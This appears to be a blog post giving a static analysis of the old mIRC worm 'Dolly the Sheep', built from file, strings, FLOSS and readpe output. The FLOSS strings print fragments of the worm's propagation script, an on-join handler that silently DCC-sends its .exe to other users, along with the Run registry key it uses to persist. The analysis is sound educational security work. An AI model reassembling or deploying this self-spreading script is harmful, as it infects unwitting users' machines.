RE: Dolly the Sheep worm
Dolly the Sheep is an IRC worm that uses the client mIRC to propagate. It appeared around 2000 (the file creation time says 1999-09-30 10:28:08 UTC) and is identified as IRC-Worm.Win32.Dolly by those AntiVirus softwares that follow the CARO Virus Naming.
My first contact with this worm was probably in 2002 or 2003. At that time IRC channels was the place where people used to meet online for chatting. Whenever you entered in to a channel, if one of the users was infected, you would see a pop-up asking you to accept the file sent by that victim.
Essentially, without any RE and based on my experience, the worm, when executed, would do:
-
Copy itself to another location.
-
Add itself to be executed when Windows started.
-
Check if the victim has mIRC installed, if so:
- It would create a mIRC script capable of sending the worm copy to another users without the victim noticing it.
My plan here is to perform a static analysis of this malware to check how the it did the things I mentioned above and see if there is something hidden that I didn’t notice at that time. For this task I’ll use Kali Linux, although this is a Windows worm, and the sample hash is 43139dd432d35d0abb2bdbb9aeff39cab4510490f27e45f397a1cedb112ce38c.
Initial Analysis
$ file dolly_the_sheep
dolly_the_sheep: PE32 executable (GUI) Intel 80386, for MS Windows, 5 sections
Yes, it is a Windows executable, no novelty so far. Next, lets check for the strings inside the executable:
$ strings -a dolly_the_sheep
!This program cannot be run in DOS mode.
.text
`.data
.idata
@.rsrc
@.reloc
MSVBVM50.DLL
%pP@
%hP@
%|P@
%xP@
%lP@
%tP@
%dP@
020430Project1
0-C000-
Form1
Form1
VB5!
dolly_the_sheep
Project1
Project1
Form1
Module1
Form
C:\Program Files\Visual Basic 5.0\VB5.OLB
shell32
SHBrowseForFolder
SHGetPathFromIDList
kernel32
lstrcatA
GetPrivateProfileStringA
WritePrivateProfileStringA
FindFilesAPI
Form_Load
FindFirstFileA
FindNextFileA
GetFileAttributesA
FindClose
advapi32.dll
RegCloseKey
RegCreateKeyA
RegSetValueExA
VBA5.DLL
mp,
00&&/
path
SearchStr
FileCount
DirCount
yY+~yD
|yx#}y
MSVBVM50.DLL
MethCallEngine
EVENT_SINK_AddRef
DllFunctionCall
EVENT_SINK_Release
EVENT_SINK_QueryInterface
__vbaExceptHandler
ProcCallEngine
1u
0 0&0,02080>0D0J0P0U0
2 2(20282@2H2P2X2
5 5(54585P5X5`5h5p5x5
6 6$6(6,6064686<6@6D6H6L6P6T6X6\6`6d6h6l6p6t6x6|6
7r7w7
8$8,8X8\8
9(9,909p9t9|9
:!:L:P:X:]:h:m:
:l;p;x;};
<,<0<8<=<H<M<|<
6 6<6@6T6
7 7$7(7
Here we start to see some interesting things. For example, the malware was created on Visual Basic 5 (VB5) according to this line C:\Program Files\Visual Basic 5.0\VB5.OLB. Other lines (Form1, Project1 and Module1) show that the programmer didn’t care changing the default names.
Some other lines of interest are:
- SHBrowseForFolder
- SHGetPathFromIDList
- lstrcatA
GetPrivateProfileStringAandWritePrivateProfileStringAare functions from Windows API for reading and writing of.inifiles.- FindFilesAPI
- Form_Load
- FindFirstFileA
- FindNextFileA
- GetFileAttributesA
- FindClose
RegCloseKey,RegCreateKeyAandRegSetValueExAare responsible for manipulating register keys. These might have been used for adding a new entry on the Windows register to allow the malware to execute when during the system initialization. This is related to the item 2 mentioned at the beginning.- SearchStr
- FileCount
- DirCount
So far I didn’t see the plain text related to the script that is created by the worm. Maybe the programmer was smart enough to encode it. However, the lines below look suspicious:
...
1u
0 0&0,02080>0D0J0P0U0
2 2(20282@2H2P2X2
5 5(54585P5X5`5h5p5x5
6 6$6(6,6064686<6@6D6H6L6P6T6X6\6`6d6h6l6p6t6x6|6
7r7w7
8$8,8X8\8
9(9,909p9t9|9
:!:L:P:X:]:h:m:
:l;p;x;};
<,<0<8<=<H<M<|<
6 6<6@6T6
7 7$7(7
If the strings above are encoded/obfuscated or not its hard to determine with a manual static analysis. To see if something else is hiddent there, I used a software called FLARE Obfuscated String Solver (FLOSS). FLOSS uses heuristics and brute-force to detect, and decode, obfuscated strings. At the moment, FLOSS unfortunately is not part of Kali Linux toolset.
Then, lets give another try using FLOSS:
$ ./floss dolly_the_sheep
FLARE FLOSS RESULTS (version v3.1.0-0-gdb9af41)
+------------------------+------------------------------------------------------------------------------------+
| file path | dolly_the_sheep |
| identified language | unknown |
| extracted strings | |
| static strings | 123 (1858 characters) |
| language strings | 0 ( 0 characters) |
| stack strings | 0 |
| tight strings | 0 |
| decoded strings | 0 |
+------------------------+------------------------------------------------------------------------------------+
────────────────────────────
FLOSS STATIC STRINGS (123)
────────────────────────────
+----------------------------------+
| FLOSS STATIC STRINGS: ASCII (73) |
+----------------------------------+
NOTE: This section was omitted since the content here is similar to the strings output.
+-------------------------------------+
| FLOSS STATIC STRINGS: UTF-16LE (50) |
+-------------------------------------+
*\AD:\MIRCSC~1\PROJECT1.VBP
Mirc
nick
.ini
anick
uservar.ini
[script]
n1=#remotecontrol on
n2=on 1:connect:auser 125 *!*@*
n3=on 1:join:if ($nick != $me) { /dcc send $nick
.exe" }
n4=ctcp 125:*:?:$1-
n5=#remotecontrol end
rfiles
remote.ini
user.ini
var.ini
addon\pedo.mrc
options
1,1,0,1,1,0,300,1,1,0,1,0,1,0,1,1,0,0,1,0,512,0,1,3,0,0,1,0
5,50,0,0,0,0,0,1,2,1,1,1,1,1,1,1,1,1,1,1,0,1,1,0,20,0,1,0,0
1,0,0,0,1,1,1,1,0,20,60,1,1,1,1,0,0,1,0,60,80,2,0,0,1,0,1
500,1,0,1,1,0,1,1,1,1,1,1,0,0,0,0,3,1,1,1,0,0,0,0,1,1,1,25,0
1,0,1,1,0,0,999,1,0,0,0,1,1024,1,1,9999,10,0,0,1,1,1,0,1,1,5000
1,1,1,1,1,1,1,1,1,1,6667,1215752191,0,1,0,0,1,0,300,10,4,0,1,22,0,0,1
1,1,9,1,1,1,1,1,1,1,0,1,0,0,0,0,0,1,0,0,0,0,100,1,1,1,1
Software\Microsoft\Windows\CurrentVersion\Run
System
.exe
mirc.ini
n3=on 1:join:#:if ($nick != $me) /dcc send $nick
.exe"
.exe "
.exe ;"
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
040904B0
CompanyName
Kaos Industries
ProductName
FileVersion
1.00
ProductVersion
1.00
InternalName
dolly_the_sheep
OriginalFilename
dolly_the_sheep.exe
$ readpe dolly_the_sheep
DOS Header
Magic number: 0x5a4d (MZ)
Bytes in last page: 144
Pages in file: 3
Relocations: 0
Size of header in paragraphs: 4
Minimum extra paragraphs: 0
Maximum extra paragraphs: 65535
Initial (relative) SS value: 0
Initial SP value: 0xb8
Initial IP value: 0
Initial (relative) CS value: 0
Address of relocation table: 0x40
Overlay number: 0
OEM identifier: 0
OEM information: 0
PE header offset: 0x80
PE header
Signature: 0x00004550 (PE)
COFF/File header
Machine: 0x14c IMAGE_FILE_MACHINE_I386
Number of sections: 5
Date/time stamp: 938687288 (Thu, 30 Sep 1999 10:28:08 UTC)
Symbol Table offset: 0
Number of symbols: 0
Size of optional header: 0xe0
Characteristics: 0x10e
Characteristics names
IMAGE_FILE_EXECUTABLE_IMAGE
IMAGE_FILE_LINE_NUMS_STRIPPED
IMAGE_FILE_LOCAL_SYMS_STRIPPED
IMAGE_FILE_32BIT_MACHINE
Optional/Image header
Magic number: 0x10b (PE32)
Linker major version: 4
Linker minor version: 20
Size of .text section: 0x2600
Size of .data section: 0x1c00
Size of .bss section: 0
Entrypoint: 0x1054
Address of .text section: 0x1000
Address of .data section: 0x4000
ImageBase: 0x400000
Alignment of sections: 0x1000
Alignment factor: 0x200
Major version of required OS: 4
Minor version of required OS: 0
Major version of image: 1
Minor version of image: 0
Major version of subsystem: 4
Minor version of subsystem: 0
Win32 version value: 0
Overwrite OS major version: (default)
Overwrite OS minor version: (default)
Overwrite OS build number: (default)
Overwrite OS platform id: (default)
Size of image: 0x8000
Size of headers: 0x400
Checksum: 0x4a82
Subsystem required: 0x2 (IMAGE_SUBSYSTEM_WINDOWS_GUI)
DLL characteristics: 0
DLL characteristics names
Size of stack to reserve: 0x100000
Size of stack to commit: 0x1000
Size of heap space to reserve: 0x100000
Size of heap space to commit: 0x1000
Loader Flags: 0
Loader Flags names
Data directories
Directory
IMAGE_DIRECTORY_ENTRY_IMPORT: 0x5000 (40 bytes)
Directory
IMAGE_DIRECTORY_ENTRY_RESOURCE: 0x6000 (2284 bytes)
Directory
IMAGE_DIRECTORY_ENTRY_BASERELOC: 0x7000 (568 bytes)
Directory
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT: 0x240 (32 bytes)
Directory
IMAGE_DIRECTORY_ENTRY_IAT: 0x5064 (60 bytes)
Imported functions
Library
Name: MSVBVM50.DLL
Functions
Function
Hint: 0
Name: MethCallEngine
Function
Ordinal: 525
Function
Hint: 0
Name: EVENT_SINK_AddRef
Function
Hint: 0
Name: DllFunctionCall
Function
Hint: 0
Name: EVENT_SINK_Release
Function
Hint: 0
Name: EVENT_SINK_QueryInterface
Function
Hint: 0
Name: __vbaExceptHandler
Function
Ordinal: 608
Function
Hint: 0
Name: ProcCallEngine
Function
Ordinal: 100
Function
Ordinal: 616
Function
Ordinal: 617
Function
Ordinal: 618
Function
Ordinal: 619
Exported functions
Sections
Section
Name: .text
Virtual Size: 0x2594 (9620 bytes)
Virtual Address: 0x1000
Size Of Raw Data: 0x2600 (9728 bytes)
Pointer To Raw Data: 0x400
Number Of Relocations: 0
Characteristics: 0x60000020
Characteristic Names
IMAGE_SCN_CNT_CODE
IMAGE_SCN_MEM_EXECUTE
IMAGE_SCN_MEM_READ
Section
Name: .data
Virtual Size: 0xad4 (2772 bytes)
Virtual Address: 0x4000
Size Of Raw Data: 0 (0 bytes)
Pointer To Raw Data: 0
Number Of Relocations: 0
Characteristics: 0xc0000040
Characteristic Names
IMAGE_SCN_CNT_INITIALIZED_DATA
IMAGE_SCN_MEM_READ
IMAGE_SCN_MEM_WRITE
Section
Name: .idata
Virtual Size: 0x140 (320 bytes)
Virtual Address: 0x5000
Size Of Raw Data: 0x200 (512 bytes)
Pointer To Raw Data: 0x2a00
Number Of Relocations: 0
Characteristics: 0x40000040
Characteristic Names
IMAGE_SCN_CNT_INITIALIZED_DATA
IMAGE_SCN_MEM_READ
Section
Name: .rsrc
Virtual Size: 0x8ec (2284 bytes)
Virtual Address: 0x6000
Size Of Raw Data: 0xa00 (2560 bytes)
Pointer To Raw Data: 0x2c00
Number Of Relocations: 0
Characteristics: 0x40000040
Characteristic Names
IMAGE_SCN_CNT_INITIALIZED_DATA
IMAGE_SCN_MEM_READ
Section
Name: .reloc
Virtual Size: 0x25a (602 bytes)
Virtual Address: 0x7000
Size Of Raw Data: 0x400 (1024 bytes)
Pointer To Raw Data: 0x3600
Number Of Relocations: 0
Characteristics: 0x42000040
Characteristic Names
IMAGE_SCN_CNT_INITIALIZED_DATA
IMAGE_SCN_MEM_DISCARDABLE
IMAGE_SCN_MEM_READ